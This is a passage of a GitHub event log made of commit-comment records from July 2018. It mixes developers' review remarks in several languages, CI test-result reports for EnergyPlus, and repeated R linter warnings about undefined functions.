{"id":"7986768147","type":"CommitCommentEvent","actor":{"login":"challenger14"},"repo":{"name":"nasa/earthdata-search"},"payload":{"comment":{"id":29758995,"position":null,"line":null,"path":null,"commit_id":"447c0282b49beb2e7a8b8c38057274a76422ffcc","created_at":"2018-07-19T04:16:32Z","updated_at":"2018-07-19T04:16:32Z","author_association":"NONE","body":"It all happened so fast..."}},"created_at":"2018-07-19T04:16:32Z"}
{"id":"7986769727","type":"CommitCommentEvent","actor":{"login":"shadowcypher"},"repo":{"name":"APStudentsReddit/ping_bot"},"payload":{"comment":{"id":29758998,"position":35,"line":35,"path":"main.py","commit_id":"aa0d0385f53dec5df2524eb266e4b58e4483295e","created_at":"2018-07-19T04:17:12Z","updated_at":"2018-07-19T04:17:12Z","author_association":"COLLABORATOR","body":"Only messages with a space in between, but yes, it would be efficient to do some more formatting."}},"created_at":"2018-07-19T04:17:12Z"}
{"id":"7986771042","type":"CommitCommentEvent","actor":{"login":"bilaltariq2122"},"repo":{"name":"parthbkgadoya/Image-based-Human-Age-and-Gender-Estimation"},"payload":{"comment":{"id":29758999,"position":null,"line":null,"path":null,"commit_id":"6f2e9c50840d8dcf04f12c8725b30d7094b7422e","created_at":"2018-07-19T04:17:45Z","updated_at":"2018-07-19T04:17:45Z","author_association":"NONE","body":"plz send me .mat files for running this code\r\n"}},"created_at":"2018-07-19T04:17:45Z"}
{"id":"7986771084","type":"CommitCommentEvent","actor":{"login":"shadowcypher"},"repo":{"name":"APStudentsReddit/ping_bot"},"payload":{"comment":{"id":29759000,"position":44,"line":44,"path":"main.py","commit_id":"aa0d0385f53dec5df2524eb266e4b58e4483295e","created_at":"2018-07-19T04:17:46Z","updated_at":"2018-07-19T04:17:46Z","author_association":"COLLABORATOR","body":"Agreed. Didn't think this one through."}},"created_at":"2018-07-19T04:17:46Z"}
{"id":"7986798166","type":"CommitCommentEvent","actor":{"login":"kuroshan"},"repo":{"name":"kuroshan/config-repository"},"payload":{"comment":{"id":29759062,"position":null,"line":null,"path":null,"commit_id":"f71daa9d805637fa62f4c32aa24a15da30e60af1","created_at":"2018-07-19T04:29:32Z","updated_at":"2018-07-19T04:29:32Z","author_association":"OWNER","body":"revertir"}},"created_at":"2018-07-19T04:29:32Z"}
{"id":"7986798911","type":"CommitCommentEvent","actor":{"login":"sigurnna"},"repo":{"name":"sigurnna/RSSNewsReader_macOS"},"payload":{"comment":{"id":29759065,"position":46,"line":83,"path":"RSSNewsReader/Common/ViewController/FeedProviderAddViewController.swift","commit_id":"37eabe4e08e1f42cb05f776a9124b8154f14e4bc","created_at":"2018-07-19T04:29:51Z","updated_at":"2018-07-19T04:29:51Z","author_association":"OWNER","body":"parse로 리턴된 데이터가 nil일 경우 isLoading이 false로 설정되지 않아서 무한 로딩에 걸리는 문제가 있음.\r\n\r\n수정해야함."}},"created_at":"2018-07-19T04:29:51Z"}
{"id":"7986802906","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29759072,"position":null,"line":null,"path":null,"commit_id":"c5adeec1a603483a84104fe93b427b573815fb0c","created_at":"2018-07-19T04:31:31Z","updated_at":"2018-07-19T04:31:31Z","author_association":"OWNER","body":"I guess so, but I don't think it adds much. This way is easier to change (at least for testing logic, where I might want to use other variables) and I also recall some previous failed tests (a while back) that tried to speed up some of these by using one-shot popcount operations. My guess is it doesn't matter too much since we're looping through all the pawns anyway and storing important values in the lookup tables."}},"created_at":"2018-07-19T04:31:31Z"}
{"id":"7986805927","type":"CommitCommentEvent","actor":{"login":"katienazarova"},"repo":{"name":"the-road-to-learn-react/the-road-to-learn-react-russian"},"payload":{"comment":{"id":29759073,"position":null,"line":null,"path":null,"commit_id":"ef9ee40f7f7ebd260ebfaab3691d927f4e0f7e75","created_at":"2018-07-19T04:32:48Z","updated_at":"2018-07-19T04:32:48Z","author_association":"NONE","body":"Всё ок :+1: "}},"created_at":"2018-07-19T04:32:48Z"}
{"id":"7986806614","type":"CommitCommentEvent","actor":{"login":"t1meshift"},"repo":{"name":"DwarfMason/Dragon-Shore"},"payload":{"comment":{"id":29759075,"position":199,"line":199,"path":"engine.js","commit_id":"8cc7701cea2bde3d3509c825090096ad7a24af49","created_at":"2018-07-19T04:33:07Z","updated_at":"2018-07-19T04:33:07Z","author_association":"COLLABORATOR","body":"Это делается в Scene лол"}},"created_at":"2018-07-19T04:33:07Z"}
{"id":"7986807442","type":"CommitCommentEvent","actor":{"login":"kuroshan"},"repo":{"name":"kuroshan/config-repository"},"payload":{"comment":{"id":29759077,"position":null,"line":null,"path":null,"commit_id":"50215236951cdedfebe6c4ab74dacea3eba04b33","created_at":"2018-07-19T04:33:29Z","updated_at":"2018-07-19T04:33:29Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-19T04:33:29Z"}
{"id":"7986808312","type":"CommitCommentEvent","actor":{"login":"darvid7"},"repo":{"name":"telstra/swagger-platform"},"payload":{"comment":{"id":29759080,"position":193,"line":122,"path":"src/backend/index.tsx","commit_id":"57d2d890b3f7f59f374291eaeb30c764725a99c7","created_at":"2018-07-19T04:33:52Z","updated_at":"2018-07-19T04:33:52Z","author_association":"COLLABORATOR","body":"This is wrong btw, the return of generateSdk has .link and .code"}},"created_at":"2018-07-19T04:33:52Z"}
{"id":"7986808405","type":"CommitCommentEvent","actor":{"login":"katienazarova"},"repo":{"name":"the-road-to-learn-react/the-road-to-learn-react-russian"},"payload":{"comment":{"id":29759081,"position":65,"line":322,"path":"manuscript/chapter5.md","commit_id":"4e2713170dbd2ae9ed84ddbfa8f8800cd559dd1c","created_at":"2018-07-19T04:33:55Z","updated_at":"2018-07-19T04:33:55Z","author_association":"NONE","body":"Функция вернёт"}},"created_at":"2018-07-19T04:33:55Z"}
{"id":"7986808793","type":"CommitCommentEvent","actor":{"login":"temyers"},"repo":{"name":"MechanicalRock/serverless-sns-filter"},"payload":{"comment":{"id":29759082,"position":null,"line":null,"path":null,"commit_id":"6ca799f9cd4947e3c3eda8cb22fe73bf856623cd","created_at":"2018-07-19T04:34:04Z","updated_at":"2018-07-19T04:34:04Z","author_association":"CONTRIBUTOR","body":"Haha no worries.  Our fault for the tests being too incomprehensible - these tests should probably be  replaced with some more acceptance level tests.\r\n\r\nI had to fix them anyway whilst trying to understand why it was failing.\r\n\r\nIt actually highlighted the desired behaviour, and should probably be an extra test:  If the function referenced does not exist, it should fail.\r\n\r\nHowever, I'd be interested to know what the situation was for you, @garyd203, that prompted your PR.  That code is used when adding the filters for a function.  So all the functions should have been generated by serverless and references been correct (hence the 'should not happen' comment)."}},"created_at":"2018-07-19T04:34:04Z"}
{"id":"7986810429","type":"CommitCommentEvent","actor":{"login":"katienazarova"},"repo":{"name":"the-road-to-learn-react/the-road-to-learn-react-russian"},"payload":{"comment":{"id":29759084,"position":null,"line":null,"path":null,"commit_id":"4e2713170dbd2ae9ed84ddbfa8f8800cd559dd1c","created_at":"2018-07-19T04:34:48Z","updated_at":"2018-07-19T04:34:48Z","author_association":"NONE","body":"Один небольшой момент не заметила сразу. "}},"created_at":"2018-07-19T04:34:48Z"}
{"id":"7986812357","type":"CommitCommentEvent","actor":{"login":"edhana"},"repo":{"name":"zendesk/twitter"},"payload":{"comment":{"id":29759086,"position":null,"line":null,"path":null,"commit_id":"74676b22bd3b71538f4704d5ba1784d0e04914d0","created_at":"2018-07-19T04:35:39Z","updated_at":"2018-07-19T04:35:39Z","author_association":"NONE","body":"Great! All clean now! 👍 💯 "}},"created_at":"2018-07-19T04:35:39Z"}
{"id":"7986815164","type":"CommitCommentEvent","actor":{"login":"baalajimaestro"},"repo":{"name":"thewhitewolf17/CSE-Semester3"},"payload":{"comment":{"id":29759090,"position":null,"line":null,"path":null,"commit_id":"2d0187745c87741bd769a27ae59c23982985289e","created_at":"2018-07-19T04:36:54Z","updated_at":"2018-07-19T04:36:54Z","author_association":"NONE","body":"Such nice stuff I got right before periodicals :)"}},"created_at":"2018-07-19T04:36:54Z"}
{"id":"7986817056","type":"CommitCommentEvent","actor":{"login":"changhoolee"},"repo":{"name":"changhoolee/profile"},"payload":{"comment":{"id":29759093,"position":5,"line":18,"path":"README.md","commit_id":"a9532e92fa9b375dea3835be239fdbf199f26a74","created_at":"2018-07-19T04:37:42Z","updated_at":"2018-07-19T04:37:42Z","author_association":"OWNER","body":"오늘은 커밋 안 하셔도 돼요.!"}},"created_at":"2018-07-19T04:37:42Z"}
{"id":"7986817368","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29759094,"position":null,"line":null,"path":null,"commit_id":"96554755660001bc20f486f814d8bdec49574102","created_at":"2018-07-19T04:37:50Z","updated_at":"2018-07-19T04:37:50Z","author_association":"NONE","body":"This has been tried a million times, the result is always the same: At LTC, this is needed to avoid stat score inflation. I'm also 50% sure this will trigger asserts when played under long enough time controls.\r\n"}},"created_at":"2018-07-19T04:37:50Z"}
{"id":"7986818364","type":"CommitCommentEvent","actor":{"login":"changhoolee"},"repo":{"name":"changhoolee/profile"},"payload":{"comment":{"id":29759095,"position":5,"line":18,"path":"README.md","commit_id":"a9532e92fa9b375dea3835be239fdbf199f26a74","created_at":"2018-07-19T04:38:17Z","updated_at":"2018-07-19T04:38:17Z","author_association":"OWNER","body":"아니에요. 공부는 해야해요!"}},"created_at":"2018-07-19T04:38:17Z"}
{"id":"7986819517","type":"CommitCommentEvent","actor":{"login":"tomtor"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29759097,"position":null,"line":null,"path":null,"commit_id":"fc03a66093bc157be3a8126b19850b12b5f83568","created_at":"2018-07-19T04:38:47Z","updated_at":"2018-07-19T04:38:47Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-19T04:38:47Z"}
{"id":"7986826528","type":"CommitCommentEvent","actor":{"login":"t1meshift"},"repo":{"name":"DwarfMason/Dragon-Shore"},"payload":{"comment":{"id":29759109,"position":202,"line":202,"path":"engine.js","commit_id":"8cc7701cea2bde3d3509c825090096ad7a24af49","created_at":"2018-07-19T04:41:54Z","updated_at":"2018-07-19T04:41:54Z","author_association":"COLLABORATOR","body":"Ой бляЯЯЯЯЯяяяяЯяяя, вот чем тебе не угодил метод `draw(context)` в объектах? Я не нашёл ни одного убедительного агрумента против этого решения, кроме твоей фобии"}},"created_at":"2018-07-19T04:41:54Z"}
{"id":"7986826799","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29759110,"position":null,"line":null,"path":null,"commit_id":"f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8","created_at":"2018-07-19T04:42:02Z","updated_at":"2018-07-19T04:42:02Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (RKStrand) - x86_64-MacOS-10.9-clang: Tests Failed (1385 of 2943 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-47.06%25-red.png)</a> \n"}},"created_at":"2018-07-19T04:42:02Z"}
{"id":"7986827179","type":"CommitCommentEvent","actor":{"login":"deveee"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29759113,"position":null,"line":null,"path":null,"commit_id":"d14916dec2642140d9381af01333a703c903ec02","created_at":"2018-07-19T04:42:12Z","updated_at":"2018-07-19T04:42:12Z","author_association":"MEMBER","body":"Indeed --soccer-goals wasn't set. I thought that it will get it from config.xml. Now it's restarted with --soccer-goals.\r\n\r\nAnd do you suggest --owner-less instead of --ranked?"}},"created_at":"2018-07-19T04:42:12Z"}
{"id":"7986830343","type":"CommitCommentEvent","actor":{"login":"vikash-indpro"},"repo":{"name":"vikash-indpro/TestNewProject"},"payload":{"comment":{"id":29759116,"position":5,"line":6,"path":"public/index.html","commit_id":"38f57689cb0052beaa0382d86738ed4e0bb06b99","created_at":"2018-07-19T04:43:33Z","updated_at":"2018-07-19T04:43:33Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-19T04:43:33Z"}
{"id":"7986830491","type":"CommitCommentEvent","actor":{"login":"wlsgussla123"},"repo":{"name":"yonghyun123/NetworkProgramming"},"payload":{"comment":{"id":29759118,"position":null,"line":null,"path":null,"commit_id":"f1087a6e6e2a38534a1720dffc61a08a556d99c6","created_at":"2018-07-19T04:43:37Z","updated_at":"2018-07-19T04:43:37Z","author_association":"NONE","body":"metadata나 다른 필요없는 파일들이 있는 것 같네요.."}},"created_at":"2018-07-19T04:43:37Z"}
{"id":"7986831296","type":"CommitCommentEvent","actor":{"login":"wlsgussla123"},"repo":{"name":"yonghyun123/NetworkProgramming"},"payload":{"comment":{"id":29759120,"position":null,"line":null,"path":null,"commit_id":"5936041f68f26a54360cc5e1139e491ae5384f3b","created_at":"2018-07-19T04:43:58Z","updated_at":"2018-07-19T04:43:58Z","author_association":"NONE","body":"그래서 수정한 걸까요.."}},"created_at":"2018-07-19T04:43:58Z"}
{"id":"7986832946","type":"CommitCommentEvent","actor":{"login":"wlsgussla123"},"repo":{"name":"yonghyun123/NetworkProgramming"},"payload":{"comment":{"id":29759124,"position":null,"line":null,"path":null,"commit_id":"745d5ab886534004d6ee5534626a96f69fa00d75","created_at":"2018-07-19T04:44:40Z","updated_at":"2018-07-19T04:44:40Z","author_association":"NONE","body":"ㅋㅋㅋㅋㅋㅋㅋ 시작했구먼"}},"created_at":"2018-07-19T04:44:40Z"}
{"id":"7986833453","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29759128,"position":null,"line":null,"path":null,"commit_id":"3049276ae76d350b62a841abc11d20e053c2db67","created_at":"2018-07-19T04:44:53Z","updated_at":"2018-07-19T04:44:53Z","author_association":"NONE","body":"Follow-up-to-#6393-SZVAV-for-PTUnit (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1682 of 1682 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3049276ae76d350b62a841abc11d20e053c2db67-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3049276ae76d350b62a841abc11d20e053c2db67-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3049276ae76d350b62a841abc11d20e053c2db67-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.2%25-green.png)</a>\n"}},"created_at":"2018-07-19T04:44:53Z"}
{"id":"7986837360","type":"CommitCommentEvent","actor":{"login":"stevenmholt1"},"repo":{"name":"justjavac/free-programming-books-zh_CN"},"payload":{"comment":{"id":29759136,"position":null,"line":null,"path":null,"commit_id":"97531a1bbb3c9c83f1fe3438bf63335df8f07626","created_at":"2018-07-19T04:46:35Z","updated_at":"2018-07-19T04:46:35Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/32422070/42922092-c4da04c6-8ae4-11e8-92b9-b04e28523791.png)\r\n![babyomine](https://user-images.githubusercontent.com/32422070/42922097-ccbf6960-8ae4-11e8-826f-ed7521a955f2.png)\r\n"}},"created_at":"2018-07-19T04:46:35Z"}
{"id":"7986844671","type":"CommitCommentEvent","actor":{"login":"rb557"},"repo":{"name":"rb557/The-2014-INC-5000-Companies"},"payload":{"comment":{"id":29759142,"position":null,"line":null,"path":null,"commit_id":"ed932fff05f5058a955d7107b856b8b36cfc14e0","created_at":"2018-07-19T04:49:46Z","updated_at":"2018-07-19T04:49:46Z","author_association":"OWNER","body":"https://public.tableau.com/profile/richa64#!/vizhome/The2014Inc50001/Dashboard4Ind_Comp_MetrowrtGrowthYrs_on_list9 "}},"created_at":"2018-07-19T04:49:46Z"}
{"id":"7986846837","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/physiology"},"payload":{"comment":{"id":29759143,"position":null,"line":null,"path":null,"commit_id":"834e17456f46dff6471a9a0d35a34cee5cbdcc87","created_at":"2018-07-19T04:50:39Z","updated_at":"2018-07-19T04:50:39Z","author_association":"NONE","body":"[R/bmi.R:14:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L14) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:15:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L15) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:83:7:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L83) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​      valid_height(height_m, ...)\n      ^~~~~~~~~~~~\n```\n[R/bmi.R:132:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L132) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:156:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L156) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:181:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L181) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:182:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L182) *warning:* **no visible global function definition for ‘valid_weight’**\n```r\n​  valid_weight(weight_kg, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:204:15:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L204) *warning:* **no visible global function definition for ‘blood_vol_Lemmens_indexed’**\n```r\n​  weight_kg * blood_vol_Lemmens_indexed(height_m, weight_kg, ...)\n              ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:214:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L214) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:215:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L215) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:238:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L238) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:239:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L239) *warning:* **no visible global function definition for ‘valid_age_adult’**\n```r\n​  valid_age_adult(age_y, ...)\n  ^~~~~~~~~~~~~~~\n```\n[R/bmi.R:260:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L260) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:261:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L261) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:264:9:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L264) *warning:* **no visible global function definition for ‘ideal_weight_adult’**\n```r\n​  0.6 * ideal_weight_adult(height_m, male) + 0.4 * weight_kg\n        ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:280:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L280) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:281:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L281) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:292:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L292) *warning:* **no visible global function definition for ‘bmi_adult’**\n```r\n​  bmi_adult(heightin * 0.0254, weightlb / 2.2046224, ...)\n  ^~~~~~~~~\n```"}},"created_at":"2018-07-19T04:50:39Z"}
{"id":"7986847617","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29759144,"position":9,"line":9,"path":"1-Osnovy-Ruby-polnaya-PO/lesson5/company_name.rb","commit_id":"988cb6aa639bf8c2d4a494cd8ae412bc1e5b5d46","created_at":"2018-07-19T04:50:58Z","updated_at":"2018-07-19T04:50:58Z","author_association":"OWNER","body":"А если использовать attr_accessor :company_name ?\r\nВместо методов с переменным класса @@company_name...будет @company_name в методе...."}},"created_at":"2018-07-19T04:50:58Z"}
{"id":"7986848218","type":"CommitCommentEvent","actor":{"login":"rb557"},"repo":{"name":"rb557/The-2014-INC-5000-Companies"},"payload":{"comment":{"id":29759145,"position":null,"line":null,"path":null,"commit_id":"18ce9b6d6d800c5301eceaa30ceb92ff930f1d75","created_at":"2018-07-19T04:51:12Z","updated_at":"2018-07-19T04:51:12Z","author_association":"OWNER","body":"The Dashboards are published and the link to it is [https://public.tableau.com/profile/richa64#!/vizhome/The2014Inc50001/Dashboard4Ind_Comp_MetrowrtGrowthYrs_on_list9]"}},"created_at":"2018-07-19T04:51:12Z"}
{"id":"7986848716","type":"CommitCommentEvent","actor":{"login":"Benau"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29759146,"position":null,"line":null,"path":null,"commit_id":"d14916dec2642140d9381af01333a703c903ec02","created_at":"2018-07-19T04:51:25Z","updated_at":"2018-07-19T04:51:25Z","author_association":"MEMBER","body":"you decide"}},"created_at":"2018-07-19T04:51:25Z"}
{"id":"7986849430","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/physiology"},"payload":{"comment":{"id":29759147,"position":null,"line":null,"path":null,"commit_id":"834e17456f46dff6471a9a0d35a34cee5cbdcc87","created_at":"2018-07-19T04:51:45Z","updated_at":"2018-07-19T04:51:45Z","author_association":"NONE","body":"[R/bmi.R:14:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L14) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:15:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L15) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:83:7:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L83) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​      valid_height(height_m, ...)\n      ^~~~~~~~~~~~\n```\n[R/bmi.R:132:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L132) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:156:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L156) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:181:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L181) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:182:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L182) *warning:* **no visible global function definition for ‘valid_weight’**\n```r\n​  valid_weight(weight_kg, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:204:15:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L204) *warning:* **no visible global function definition for ‘blood_vol_Lemmens_indexed’**\n```r\n​  weight_kg * blood_vol_Lemmens_indexed(height_m, weight_kg, ...)\n              ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:214:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L214) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:215:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L215) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:238:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L238) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:239:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L239) *warning:* **no visible global function definition for ‘valid_age_adult’**\n```r\n​  valid_age_adult(age_y, ...)\n  ^~~~~~~~~~~~~~~\n```\n[R/bmi.R:260:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L260) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:261:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L261) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:264:9:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L264) *warning:* **no visible global function definition for ‘ideal_weight_adult’**\n```r\n​  0.6 * ideal_weight_adult(height_m, male) + 0.4 * weight_kg\n        ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:280:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L280) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:281:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L281) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:292:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L292) *warning:* **no visible global function definition for ‘bmi_adult’**\n```r\n​  bmi_adult(heightin * 0.0254, weightlb / 2.2046224, ...)\n  